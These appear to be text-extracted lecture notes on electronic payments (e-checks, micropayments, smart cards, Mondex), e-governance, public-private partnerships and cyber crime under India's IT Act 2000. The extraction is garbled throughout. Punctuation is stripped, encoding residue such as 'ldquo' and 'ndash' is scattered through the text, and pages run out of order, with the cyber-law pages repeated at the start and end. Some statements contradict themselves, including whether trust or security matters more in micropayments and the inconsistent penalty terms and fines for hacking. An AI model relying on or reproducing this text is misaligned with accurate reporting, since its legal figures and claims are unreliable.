Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 28
28
who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with 2 Duplicate detection Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks 3 Encryption The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL) How to get started with electronic checks
Herersquos how to implement electronic check conversion as quickly and easily as possible 1 Choose a well-established processing company Good pricing is important but working with a reliable processor is essential 2 Notify your customers that your business will begin using electronic check conversion Federal laws require you to post a notification about this change and give your customers a takeaway copy You must also provide customers with a phone number to request more information 3 Look for a processor that makes it easy to align your current business processes with your new electronic processing system export customer data and integrate your new system with your business management software 4 QuickBooks Payments offers a complete payment processing solution Businesses can take payments from their customers in many ways- from ACH bank payments electronic checks to credit cards including Visa MasterCard Discover and American Express In addition to offering many ways to get paid QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature
This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service
1 Payer (customerbill payer) is prompted to authorize electronic debit enter bank routing number (ABA) and account number
PREPARED BY ARUN PRATAP SINGH 29
29
2 Merchants sales system securely transfers order information to CyberSource over the Internet
3 CyberSource forwards bank routing number and account number to processor 4 The routing number and account number are validated and the integrity of the accounts
checking history is verified Processor forwards approvedecline results to CyberSource 5 CyberSource returns approvaldecline message to merchant 6 If approved CyberSource routes check for settlement through a processer to the
Automated Clearinghouse System (ACH) Funds are deposited in approximately 1-3 business days
Four Different Scenarios of the FSTC E-check System ndash
PREPARED BY ARUN PRATAP SINGH 30
30
MICROPAYMENT METHODS
Traditional payment methods are called macropayment methods A new type of payment method known as micropayment method is emerging to cater for
very low value transactions Example
Millicent (pre-paymentcredit based) Paywords (post-payment)
PREPARED BY ARUN PRATAP SINGH 31
31
MICRO PAYMENT IS -
Very small payments made over the Web Transactions too small for credit cards Can be as little as a fraction of a cent Alternative to subscription and advertising Can go in either direction
A micropayment is an e-commerce transaction involving a very small sum of money in exchange
for something made available online such as an application download a service or Web-based
content
Micropayments are sometimes defined as anything less than 75 cents and can be as low as a
fraction of a cent A special type of system is required for such payments which are too small to
be feasible for processing through credit card companies
Heres one scheme for micropayment The user and seller each establish an account with a third-
party service provider who monitors collects and distributes micropayments The seller encodes
per-fee links inside a Web page When the user initiates a transaction payment goes through an
Internet wallet account managed by the service provider Micropayments accumulate until they
are collected as single larger payments Such a system is helpful when a user wants to make
PREPARED BY ARUN PRATAP SINGH 32
32
one-time micropayments to multiple sellers Seller-based accounts are more common for repeat
business with an individual enterprise
Once a common micropayment standard has been established some experts predict that
streaming media sites music and application downloads content vendors sports access sites
and other specialized resources will make pay-per-use common online
Advantages and risks ndash
With a micropayment system many small transactions are summarised over a defined period of
time and charged in one bill For that reason micropayments are applicable for businesses where
even small costs for every single transaction would be inefficient 4) The main benefits from the
customer site in using micropayment are speed and flexibility From the merchantsrsquo site speed
and acceptable transaction fees are very important As the transactions involve small capital
security does not have the highest priority Much more important than trust is security User and
merchants are more likely to use an insecure payment system from a trusted company than a
secure payment system from an untrusted (unknown) company Therefore the market entry
barriers for new providers are high Any company that wishes to enter this area must have plenty
of capital and be willing to invest a lot before return on investment as it is extremely difficult for
new payment systems to achieve widespread acceptance
Payment options ndash
Micropayment providers offer various payment modules Merchants need to sign up for an account with a chosen provider and decide for a module that suits their needs The customer gets an option (or options) how to pay for desired content or goods
The most common micropayment options are listed below 6) Call2pay Payment by telephone The customer is requested to call a toll number The fee is set on a per-call basis for the desired payment amount
Handypay Payment via mobile phone bill The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment
Ebank2pay Payment using online banking The customer transfers the payment amount his or her online banking access and a TAN After making payment the customer receives access to the purchased product
Credit card Payment per credit card The customer enters his credit card data and confirms the transaction The transactions can be optionally carried out with the 3-D Securetrade method (verified by VISAtrade and Mastercard SecureCodetrade)
Direct debit
PREPARED BY ARUN PRATAP SINGH 33
33
Payment by direct debit The customer enters his or her bank ID and account number and confirms the direct debit authorization
PayPal MicroPayments is a micropayment system that charges payments to
users PayPal account and allows transactions of less than US$12 to take place The service is
as of 2013 offered in select currencies only
Micropayment Uses ndash
Publishing
Marketing
Software
Entertainment
Web Services
SMART CARD
A smart card chip card or integrated circuit card (ICC) is any pocket-sized card with
embedded integrated circuits Smart cards are made of plastic generally polyvinyl chloride but
sometimes polyethylene terephthalate based polyesters acrylonitrile butadiene
styrene orpolycarbonate Since April 2009 a Japanese company has manufactured reusable
financial smart cards made from paper
Smart cards can provide identification authentication data storage and application
processing[2] Smart cards may provide strong security authentication for single sign-on (SSO)
within large organizations
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
What is Smart Card
Standard credit card-sized with microchip embedded on it
Two types
Memory-only chips
Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
PREPARED BY ARUN PRATAP SINGH 34
34
Perform complex encryption routines quickly
In 1968 German inventors patent combination of plastic cards with micro chips
Construction of Smart Cards ndash
PREPARED BY ARUN PRATAP SINGH 35
35
PREPARED BY ARUN PRATAP SINGH 36
36
Why Smart Cards ndash
Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats
Advantages ndash
Flexibility
Security
Portability
Increasing data storage capacity
Reliability
Schematic overview of a smart card
PREPARED BY ARUN PRATAP SINGH 37
37
Smart card Processing
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example Mondex
PREPARED BY ARUN PRATAP SINGH 38
38
OVERVIEW OF MONDEX
Mondex is a smart card electronic cash system which was originally developed by National
Westminster Bank in the United Kingdom and subsequently sold to MasterCard International
Mondex launched in a number of markets during the 1990s expanding from an original trial in
Swindon UK to Hong Kong Guelph and New York It was also trialled on several British
university campuses from the late 1990s including the University of Edinburgh University of
Exeter (between 1997 and 2001) University of York University of Nottingham Aston
University and Sheffield Hallam University
Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks etc
Keep transaction records
Password protection and ldquolock cardrdquo functions
Portable balance finder to check balance
Support multiple currencies
PREPARED BY ARUN PRATAP SINGH 39
39
ADVANTAGES
CONSUMER ndash
Convenience
Accessibility
On chip record of recent transactions
Home load
Internet purchases
MERCHANT ndash
Reliable-Off line payment
Higher security
Low transaction cost
Reduced cash handling
FINANCIAL INSTITUTION ndash
Strengthen customer relationships
New financial and commercial partnerships
Mondex is a concept for an electronic payment system that provides an alternate to cash particularly small currency and coins (micro-payment) The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK
In July 1996 initiated by NatWest and Midland Bank PLC Mondex International Ltd was officially established by 17 major banks from North America AsiaPacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept technology and brand In the same year MasterCard International acquired 51 ownership of Mondex International and fully endorsed the Mondex technology architecture
How does Mondex Protect Privacy ndash
Principles protected
o Limits for collecting personal information
o limits for using disclosing and keeping personal information
o keeping personal information accurate
o safeguarding personal information
PREPARED BY ARUN PRATAP SINGH 40
40
Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions
Limits for using disclosing and keeping personal information
o safeguard deposits
o to re-imburse for non-performance
Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name
Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
